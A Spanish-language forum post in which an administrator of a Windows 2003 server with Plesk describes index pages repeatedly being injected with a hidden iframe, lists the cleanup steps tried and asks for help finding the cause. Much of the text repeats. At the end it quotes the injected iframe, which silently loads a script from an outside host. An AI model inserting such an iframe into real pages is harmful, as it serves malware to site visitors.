#1 Iframes en mi server infectan los sitios
Buenas a todos, estoy teniendo un inconveniente con mi server Windows 2003 Enterprise SP2.
Es un servidor dedicado donde tengo un plesk con la ultima version y totalmente actualizado al dia el win.
Hace un tiempo comenzaron a modificarse las paginas *index*.asp, *index*.htm*, *index*.php con un iframe que se coloca despues del <body> y la verdad que ya no se que hacer al respecto.
Comento lo que ya hice asi pueden ver si me dan una mano.
(con el problema en mi server, se decidio hacer estas cosas)
- reinstalacion del win 2003 completo y actualizado al dia
- instalacion del nod 32 actualizado
- escaneo completo del server.
- instalacino del plesk con la ultima version y totalmente actualizado
- migracion de los sitios
- nuevo escaneo del server.
- cambio en los permisos de todas las carpetas para que no se puedan modificar mediante la web.
- colocacion de permisos de escritura en carpetas especificas como "galerias de fotos" en las cuales las paginas con administracion web pueden subir fotos desde un formulario. (son carpetas aparte de la raiz)
Despues de hacer todo eso, el problema sigue... menos que antes pero sigue.
Entonces pensando que podria ser una infeccion por ftp, bloquee todas las cuentas ftp que apuntan a las raices de los sitios. Siguio el problema, se infectaban igualmente.
Descartado el ftp...
Cada vez que se infectaba un sitio con el IFRAME, lo que hice fue mirar el horario en que fue cambiado el archivo...
De alli buscaba en el Visor de susesos en ese horario especifico a ver que encontraba, y no hay nada "raro".
Entonces me baje varios logs de esos sitios, me puse a filtrar las lineas en 5 minutos antes de la modificacion del archivo y 5 minutos despues... Tampoco vi nada raro desde los logs del IIS.
Ahora no se por donde mas buscar.
Lo que estoy pensando es colocar algun programa o habilitar de alguna forma una auditoria para saber que proceso, programa o servicio me esta modificando esos archivos y clavandome el IFRAME.
les paso uno de los iframes que tengo para que lo vean.
Como este iframe, se metieron muchos con otras direcciones pero con la misma forma, y otros peor porque tienen ancho y altura y queda una franja blanca grande arriba de los sitios, y porsupuesto cuando la gente entra a esos sitios algunos antivirus los detectan...
Saludos.
Es un servidor dedicado donde tengo un plesk con la ultima version y totalmente actualizado al dia el win.
Hace un tiempo comenzaron a modificarse las paginas *index*.asp, *index*.htm*, *index*.php con un iframe que se coloca despues del <body> y la verdad que ya no se que hacer al respecto.
Comento lo que ya hice asi pueden ver si me dan una mano.
(con el problema en mi server, se decidio hacer estas cosas)
- reinstalacion del win 2003 completo y actualizado al dia
- instalacion del nod 32 actualizado
- escaneo completo del server.
- instalacino del plesk con la ultima version y totalmente actualizado
- migracion de los sitios
- nuevo escaneo del server.
- cambio en los permisos de todas las carpetas para que no se puedan modificar mediante la web.
- colocacion de permisos de escritura en carpetas especificas como "galerias de fotos" en las cuales las paginas con administracion web pueden subir fotos desde un formulario. (son carpetas aparte de la raiz)
Despues de hacer todo eso, el problema sigue... menos que antes pero sigue.
Entonces pensando que podria ser una infeccion por ftp, bloquee todas las cuentas ftp que apuntan a las raices de los sitios. Siguio el problema, se infectaban igualmente.
Descartado el ftp...
Cada vez que se infectaba un sitio con el IFRAME, lo que hice fue mirar el horario en que fue cambiado el archivo...
De alli buscaba en el Visor de susesos en ese horario especifico a ver que encontraba, y no hay nada "raro".
Entonces me baje varios logs de esos sitios, me puse a filtrar las lineas en 5 minutos antes de la modificacion del archivo y 5 minutos despues... Tampoco vi nada raro desde los logs del IIS.
Ahora no se por donde mas buscar.
Lo que estoy pensando es colocar algun programa o habilitar de alguna forma una auditoria para saber que proceso, programa o servicio me esta modificando esos archivos y clavandome el IFRAME.
les paso uno de los iframes que tengo para que lo vean.
Código HTML:
<iframe src="http://bigtopmanagement.cn:8080/ts/in.cgi?pepsi12" width=2 height=4 style="visibility: hidden"></iframe>
Saludos.
0
